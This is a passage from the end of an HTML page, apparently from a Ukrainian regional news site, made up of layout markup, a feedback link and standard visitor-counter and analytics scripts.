</script>
<noscript>
<a href="http://www.bigmir.net/" target="_blank"><img src="http://c.bigmir.net/?v16867514&s16867514&t29" width="160" height="19" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>
<!--bigmir)net TOP 100-->

<!-- I.UA counter --><a href="http://www.i.ua/" target="_blank" onclick="this.href='http://i.ua/r.php?95220';" title="Rated by I.UA">
<script type="text/javascript" language="javascript"><!--
iS='<img src="http://r.i.ua/s?u95220&p196&n'+Math.random();
iD=document;iD.cookie="iua=1";if(iD.cookie)iS+='&c1';
iS+='&d'+(screen.colorDepth?screen.colorDepth:screen.pixelDepth)
+"&w"+screen.width+'&h'+screen.height;
iT=iD.referrer.slice(7);iH=window.location.href.slice(7);
((iI=iT.indexOf('/'))!=-1)?(iT=iT.substring(0,iI)):(iI=iT.length);
if(iT!=iH.substring(0,iI))iS+='&f'+escape(iD.referrer.slice(7));
iS+='&r'+escape(iH);
iD.write(iS+'" border="0" width="160" height="19" />');
//--></script></a><!-- End of I.UA counter -->						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
                </div>
		
</div>
<div class="rt-grid-6 rt-omega">
                    <div class="square2">
                    <div class="rt-block">
				<div class="rt-module-surround">
					<div class="rt-module-top"><div class="rt-module-top2"><div class="rt-module-top3"></div></div></div>
					<div class="rt-module-inner">
	                							<div class="module-content">
		                	<ul class="menu"><li class="item14"><a href="/feedback"><span>Зворотній зв'язок</span></a></li></ul>						</div>
					</div>
					<div class="rt-module-bottom"><div class="rt-module-bottom2"><div class="rt-module-bottom3"></div></div></div>
				</div>
            </div>
                </div>
		
</div>
							<div class="clear"></div>
						</div></div>
																	</div>
									</div></div></div>
				<div class="rt-surround-bottom"><div class="rt-surround-bottom2"><div class="rt-surround-bottom3"></div></div></div>
											</div>
		</div>
		<!--<a href="http://procherk.info/pages/duketime"><div id="brandleft"></div></a>
		<a href="http://procherk.info/pages/duketime"><div id="brandright"></div></a>-->
				<!--<script type="text/javascript">
			function getClientWidth()
			{
				return document.compatMode=='CSS1Compat' && !window.opera?document.documentElement.clientWidth:document.body.clientWidth;
			}
			var cw=getClientWidth();
			var bl=document.getElementById('brandleft');
			var br=document.getElementById('brandright');
			if (cw>1220) {
				bl.style.left=((cw/2)-480-130)+'px';
				br.style.left=((cw/2)+480)+'px';
			}
			else {
				bl.style.visibility='hidden';
				br.style.visibility='hidden';			
			}
		</script>-->	

		
		<script type="text/javascript">

		  var _gaq = _gaq || [];
		  _gaq.push(['_setAccount', 'UA-17253405-2']);
		  _gaq.push(['_trackPageview']);

		  (function() {
			var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
			ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
			var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
		  })();

		</script>		
		
		<script async src="https://cdn.onthe.io/io.js/9Zo77TkKmR9l"></script> 

		
	</body>
</html>
